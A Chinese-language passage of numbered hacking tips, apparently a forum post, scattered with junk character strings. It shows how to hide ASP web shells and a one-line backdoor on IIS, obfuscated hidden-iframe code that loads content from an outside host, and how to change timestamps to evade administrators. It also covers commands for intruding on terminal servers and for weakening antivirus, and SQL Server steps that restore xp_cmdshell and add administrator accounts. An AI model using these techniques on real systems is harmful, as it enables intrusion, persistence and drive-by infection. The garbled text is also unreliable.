[ T; H+ e) K w# i用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。: K2 D2 Z- t8 {6 V9 z
+ I0 C1 B, H- e4 p. f6 ?
53、隐藏ASP后门的两种方法0 ]' H3 a: m* {0 i
1、建立非标准目录:mkdir images..\
/ y: v Y1 J, c F: N拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
7 f9 k( m4 R2 s1 A, u通过web访问ASP木马:http://ip/images../news.asp?action=login# X! K6 V0 ]0 B, m i. g( T
如何删除非标准目录:rmdir images..\ /s
8 G- H* _, v4 s" G5 n% b' [* d4 |2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
& p4 ?& k/ }9 ^+ v9 Tmkdir programme.asp
0 L( m& X% B U! l新建1.txt文件内容:<!--#include file=”12.jpg”-->
# M( I, N: m8 R% X9 C1 [) ]* a/ g新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
+ Y$ p; }. o5 R2 e& @attrib +H +S programme.asp' r. J' B' ]6 m
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
2 {( j5 |# e8 [- f
5 q [5 U+ U V/ ~8 ]! K54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
8 l3 c3 J q5 S& d; D$ R) p0 o然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。, i1 ?. S* r% a Q: k- h* Z% V
) \; n! n- @' Z) Z. {3 C, ]55、JS隐蔽挂马5 {8 x6 Q' K: A, t* _! C9 l# {# M
1.
) m6 v" t0 w: _$ Z7 Bvar tr4c3="<iframe src=ht";6 t% c+ D* s% t5 _% {5 H
tr4c3 = tr4c3+"tp:/";
* J s! ?, I7 ] E9 [tr4c3 = tr4c3+"/ww";
" {# n( ~* Q% y2 str4c3 = tr4c3+"w.tr4";3 z4 E0 W n3 e
tr4c3 = tr4c3+"c3.com/inc/m";1 E8 E5 i) p+ ]$ S$ c$ T6 ~2 T4 N
tr4c3 = tr4c3+"m.htm style="display:none"></i";
: H; b/ m( s7 B, i* B l6 O& R9 r- qtr4c3 =tr4c3+"frame>'";
% a- k8 k" f+ w) idocument.write(tr4c3);8 m! I4 x3 U) K) Z4 L# S
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。8 V) B4 o# i5 @9 o; W) I3 U
# I* ^4 n0 ]" d
2.* m+ t% j5 N) |- {' E3 u2 o
转换进制,然后用EVAL执行。如6 l8 ~5 P/ Q" V/ V- ~+ U2 m
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
, f7 B: _6 l# W8 X不过这个有点显眼。
" u1 ] l# F& d6 ^3.
8 @1 d" [) j+ |- M, m: s% x6 cdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');% {! o0 J, v$ d. K
最后一点,别忘了把文件的时间也修改下。
4 T- J- a( d4 L( P$ I5 @1 b( |, v9 F( ]# t6 ^
56.3389终端入侵常用DOS命令
+ r# ~+ R5 D1 }. ]taskkill taskkill /PID 1248 /t
& [$ d; j0 n8 Y6 D! \) f) O
& J4 r5 q8 ?( w6 K! Btasklist 查进程
3 |" t0 `! {/ w3 o- n6 n9 n& ^, X0 z" g4 \
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
. d" x! a3 O! t: ]! @iisreset /reboot! E, ]' G9 c8 I
tsshutdn /reboot /delay:1 重起服务器
. X3 w$ ?2 N( y
8 _3 n: z/ u! n9 Elogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,5 B5 Y2 O# T( E" @1 |8 n
2 U2 r+ D2 k0 I& E
query user 查看当前终端用户在线情况
" T$ m k! M7 k# s% Q8 K/ e4 ^: S- D6 Y; r+ _( ?. z
要显示有关所有会话使用的进程的信息,请键入:query process *
* ~. A2 D# Q* D# B) a4 c" r2 ?& v" k h' g
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2( h6 [3 v! ~0 S) A5 S
! n% D; o S+ O
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
/ Y+ W$ C* n* C. _5 l1 S" t9 F2 |3 r1 N2 ^
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
, p1 U* b/ q& R0 M: l8 c" r) P9 P1 _3 d' r
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启6 e/ n: S/ e8 S" \
6 X5 ]5 @8 k, X9 {9 _9 S命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
$ f, Y0 [. w% M! U i( e
' f1 ~% X% |9 a9 ?' U2 @( h命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
3 Z. V& ~, S- _* f3 \# U9 H5 M* i1 w1 x8 @, H* u9 q: G
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
) X; X0 I- _ t
% U: d2 L6 l- K! K* V56、在地址栏或按Ctrl+O,输入:" r5 \" u- e8 B4 W! r
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
* @6 U9 K3 T( m" d" f" H1 Z2 c; a& H) \# X8 o6 A, l; {: ~
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
/ F+ j6 D: X$ h: |, T! l% D ?! F" N& z D, s9 }
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
' z: `1 p/ s- K7 K8 k用net localgroup administrators是可以看到管理组下,加了$的用户的。: X; ~6 _$ d8 f U- H6 Z I
& `* c6 x* B1 X58、 sa弱口令相关命令7 r% _4 e, S) I+ L" l, k
, B8 h8 l. @ D1 y8 M! p! [, Y一.更改sa口令方法:
# R! D9 C$ V# c8 V. C! Z( [用sql综合利用工具连接后,执行命令:1 ]# Y5 }7 U& V1 Z9 ^
exec sp_password NULL,'20001001','sa'
. t: V0 v' \" p: e/ `(提示:慎用!)+ e! K z9 p; C% O9 i2 K
; [) O7 p0 |( ?二.简单修补sa弱口令.
: N( V) e; N, Y" W" ]; s
5 h; m3 k$ P7 B6 B# b' y- ^& o! ~方法1:查询分离器连接后执行:3 o5 M0 n4 L Q2 z
if exists (select * from \1 s0 }" ?/ P! X! f6 H& y
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
" O9 t- b6 n$ E0 T1 m- n2 ]OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
+ M- Z! @% X* T" v" _- Q. s- ^9 l& A
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
( ?! V+ C* {% s8 T4 `+ V. D+ W2 ^0 u3 ^& J2 s; {
GO6 S8 \' N8 R1 r, h+ y/ J6 S0 [/ C
8 C( _6 S4 c5 Z8 l. Y+ }
然后按F5键命令执行完毕
$ O4 h* P( m1 N$ t' l+ a
- P' p% p" ?+ R. r u4 |' b方法2:查询分离器连接后
6 z2 Z/ }$ f' m* d第一步执行:use master/ a1 y, P) y" D5 Z
第二步执行:sp_dropextendedproc 'xp_cmdshell'" ^- B" D8 N7 N, c2 G. \! E4 m
然后按F5键命令执行完毕
E) i; ~, F) \
' j! Z+ `( v" y* l3 j# P- \4 i ^0 C, w- O& X: x
三.常见情况恢复执行xp_cmdshell.2 q) q ~1 z5 b
0 H/ r6 C: P. y0 y
# W! ]0 M+ G7 k1 }7 _
1 未能找到存储过程'master..xpcmdshell'.2 E8 [5 t' z9 E# g. R3 _. [
恢复方法:查询分离器连接后,
; a6 r& u* f7 y第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int% H; Q( L$ x8 z# l
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
( f! @) P$ X% L* ~) M% U( O. Q然后按F5键命令执行完毕3 M% m$ q! T- Y3 f
) V* Y: @& \1 P2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
- l- s/ Z$ h& U4 N* G恢复方法:查询分离器连接后,
# f1 ~* e5 B1 w# h& {; F第一步执行:sp_dropextendedproc "xp_cmdshell"6 ?0 ?8 t+ @; n, D
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
. z# `& W' p* Q( g+ W! g$ J然后按F5键命令执行完毕. t8 H) |. u% I) ], q* @# Z ~
0 W/ H' i6 E; t3 v" ?' q- a3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
7 I6 s7 ?; L" s1 G. `0 i5 S恢复方法:查询分离器连接后,
& I9 r. J% M% i+ k) T& ~; E3 H; ^第一步执行:exec sp_dropextendedproc 'xp_cmdshell'2 f E8 Y3 ]/ |2 \( b! x! X1 ?7 K4 Z
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' 5 Q0 m# p4 ]( x9 ^6 M5 z
然后按F5键命令执行完毕 K& U, D1 v2 \3 P( |
$ s) m) F" O! @+ J
四.终极方法.8 e/ D8 ] Q1 Y
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
6 U9 `( @' d* A- z$ n, ]查询分离器连接后,* Z/ m$ B! e: |9 O
2000servser系统:- Q$ `0 j: K# `2 E5 E
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'( a& E% D) O: v# z" F3 r, L& v b
3 I* O* e2 D( o7 r) R8 [7 a6 {* F
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
4 |9 {8 p2 `0 H. l
, E5 R8 S% K9 Mxp或2003server系统:' \ Y7 D# j7 n9 C3 H
# _7 i. m' m7 s/ }
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'. l& H0 j2 Y% r! u
$ O. s& @( F9 S0 C5 c: o7 S
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'. [- [' e! m0 A1 i( ?
|